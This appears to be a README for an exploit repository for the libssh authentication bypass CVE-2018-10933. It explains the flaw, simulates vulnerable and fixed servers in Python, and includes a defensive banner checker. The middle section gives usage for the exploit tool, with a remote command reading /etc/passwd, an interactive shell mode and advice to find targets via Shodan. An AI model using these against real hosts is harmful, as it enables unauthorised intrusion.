CVE-2018-10933 is an authentication bypass in libssh's server-side state machine, fixed in versions 0.7.6 and 0.8.4 (versions from 0.6 up to those releases are affected). A malicious client could open channels without ever authenticating, giving it unauthorized access to whatever the libssh-based server exposes, such as a shell or command execution.
The root cause is that libssh did not check which side of the connection was allowed to send a given user-authentication message. SSH2_MSG_USERAUTH_SUCCESS is a message the server sends to the client to announce that authentication succeeded, but a libssh server that received this message from a client ran the same handler and marked the session as authenticated. Think of the connection as a sequence of steps (key exchange, authentication, channel open): because libssh did not enforce the order of these steps on the server side, a client could skip authentication entirely and jump straight to opening channels and executing commands.
Interestingly, a similar issue had been found earlier in the Python SSH library Paramiko: CVE-2018-7750, where the server did not verify that authentication had completed before processing other requests.
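To make the mechanism concrete, here is an added example (not libssh's code, and not part of this repository): a small Python model of an SSH server's user-authentication state. The message numbers are the real SSH ones; the server classes, the run_session driver and the password are constructed for the demonstration. The vulnerable class shows what happens when a client-sent SSH2_MSG_USERAUTH_SUCCESS is dispatched to the handler meant for the client side; the fixed class rejects server-only messages before they reach any handler.

```python
# Added example, not libssh's code: a minimal Python model of an SSH server's
# user-authentication state, contrasting the pre-fix behaviour that makes
# CVE-2018-10933 possible with the post-fix behaviour. Message numbers are
# the real SSH ones (RFC 4252 / RFC 4254); the server classes, the session
# driver and the password are constructed for the demonstration.
SSH2_MSG_USERAUTH_REQUEST = 50   # client -> server: "let me in with these credentials"
SSH2_MSG_USERAUTH_FAILURE = 51   # server -> client
SSH2_MSG_USERAUTH_SUCCESS = 52   # server -> client: "you are authenticated"
SSH2_MSG_CHANNEL_OPEN = 90       # client -> server, only meaningful once authenticated

# Messages that only a server may emit; a server must never accept them.
SERVER_ONLY_MESSAGES = {SSH2_MSG_USERAUTH_FAILURE, SSH2_MSG_USERAUTH_SUCCESS}


class VulnerableServer:
    """Models the libssh < 0.7.6 / 0.8.4 behaviour: the userauth handlers are
    reachable regardless of which side sent the packet, so a server-only
    message arriving from the client is processed as if the server had
    produced it, and the session is marked authenticated."""

    def __init__(self, valid_password):
        self.valid_password = valid_password
        self.authenticated = False

    def handle(self, msg_type, payload=None):
        if msg_type == SSH2_MSG_USERAUTH_REQUEST:
            if payload == self.valid_password:
                self.authenticated = True
                return SSH2_MSG_USERAUTH_SUCCESS
            return SSH2_MSG_USERAUTH_FAILURE
        if msg_type == SSH2_MSG_USERAUTH_SUCCESS:
            # The bug: a client-supplied "success" flips the auth state.
            self.authenticated = True
            return None
        if msg_type == SSH2_MSG_CHANNEL_OPEN:
            if self.authenticated:
                return "channel opened"
            return "disconnect: not authenticated"
        return "disconnect: unexpected message"


class FixedServer(VulnerableServer):
    """Models the fix: in server mode, refuse any message the client is not
    permitted to send before it reaches a handler."""

    def handle(self, msg_type, payload=None):
        if msg_type in SERVER_ONLY_MESSAGES:
            return "disconnect: protocol error"
        return super().handle(msg_type, payload)


def run_session(server, messages):
    """Feed (msg_type, payload) pairs to a server in order and collect its
    replies; a 'disconnect' reply ends the session, as it would on the wire."""
    replies = []
    for msg_type, payload in messages:
        reply = server.handle(msg_type, payload)
        replies.append(reply)
        if isinstance(reply, str) and reply.startswith("disconnect"):
            break
    return replies


# The CVE-2018-10933 sequence: no USERAUTH_REQUEST at all, just the
# server-side "success" message followed by a channel open.
BYPASS_SEQUENCE = [
    (SSH2_MSG_USERAUTH_SUCCESS, None),
    (SSH2_MSG_CHANNEL_OPEN, "session"),
]


def bypass_opens_channel(server_cls, password="hunter2"):
    """True if the bypass sequence ends with a usable channel on server_cls."""
    replies = run_session(server_cls(password), BYPASS_SEQUENCE)
    return replies[-1] == "channel opened"


if __name__ == "__main__":
    for cls in (VulnerableServer, FixedServer):
        print(cls.__name__, "bypassed:", bypass_opens_channel(cls))
```

The point to take from the model is that the fix is a direction check, not a credential check: a server must treat any server-only message arriving from the client as a protocol error and drop the connection, rather than letting it reach the handler that updates the authentication state.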
Exploit-DB : https://www.exploit-db.com/exploits/45638
Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
sudo apt-get install python3 python3-pip
gh repo clone EmmanuelCruzL/CVE-2018-10933
cd CVE-2018-10933
pip3 install -r requirements.txt
python3 main.py
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
Examples (the three modes -t, -c and -i are mutually exclusive; replace 0.0.0.0 with the target):
python3 main.py 0.0.0.0 -p 22 -t
python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"
python3 main.py 0.0.0.0 -p 22 -i
[!] Vulnerable devices can be found with shodan.io by searching for the libssh banner.
- ( Port 22 is the default, but libssh-based services also commonly listen on other ports such as 2222, 3333 or 4444, so check those too )
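The -t option above only checks the libssh version the server advertises. As an added example (my code, not this repository's main.py), the following script reads the SSH identification line from a host and classifies it against the fixed releases; the sample banners are constructed, and the host and port come from the command line. A banner check identifies a build, not the bug: distributions can backport the fix without changing the version string, and a libssh build used only as a client is not exposed, so treat the result as a lead to confirm, not as proof.

```python
# Added example, not this repository's main.py: classify an SSH server
# identification line by libssh version against the CVE-2018-10933 fixes.
import re
import socket

BANNER_RE = re.compile(rb"libssh[_-](\d+)\.(\d+)(?:\.(\d+))?")

# Affected ranges per the libssh advisory: 0.6.x, 0.7.0-0.7.5 and 0.8.0-0.8.3.
# Each entry is [low, high): low is vulnerable, high is the fixed release.
VULNERABLE_RANGES = [((0, 6, 0), (0, 7, 6)), ((0, 8, 0), (0, 8, 4))]


def parse_libssh_version(banner):
    """Return the libssh version as a (major, minor, patch) tuple from an
    SSH identification string, or None if the banner is not libssh's."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_version(version):
    return any(lo <= version < hi for lo, hi in VULNERABLE_RANGES)


def classify_banner(banner):
    """'not-libssh', 'vulnerable' or 'patched' for one identification line."""
    version = parse_libssh_version(banner)
    if version is None:
        return "not-libssh"
    return "vulnerable" if is_vulnerable_version(version) else "patched"


def grab_banner(host, port=22, timeout=5.0):
    """Read the server identification line (RFC 4253 section 4.2). The
    server sends it before anything else, so no SSH handshake is needed.
    Servers may send other lines first, so skip ahead to the 'SSH-' line."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        for line in f:
            if line.startswith(b"SSH-"):
                return line.rstrip(b"\r\n")
    return b""


# Constructed sample banners (not captured from real hosts).
SAMPLE_BANNERS = [
    b"SSH-2.0-libssh_0.8.1",
    b"SSH-2.0-libssh_0.7.5",
    b"SSH-2.0-libssh_0.8.4",
    b"SSH-2.0-libssh-0.6.3",
    b"SSH-2.0-OpenSSH_7.9",
]

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        host = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 22
        banner = grab_banner(host, port)
        print(banner.decode(errors="replace"), classify_banner(banner))
    else:
        for b in SAMPLE_BANNERS:
            print(b.decode(), classify_banner(b))
```

Run it with no arguments to see the classification of the constructed samples, or with a host and optional port (for example `python3 banner_check.py 0.0.0.0 2222`) to grab and classify a live banner; the filename is an assumption.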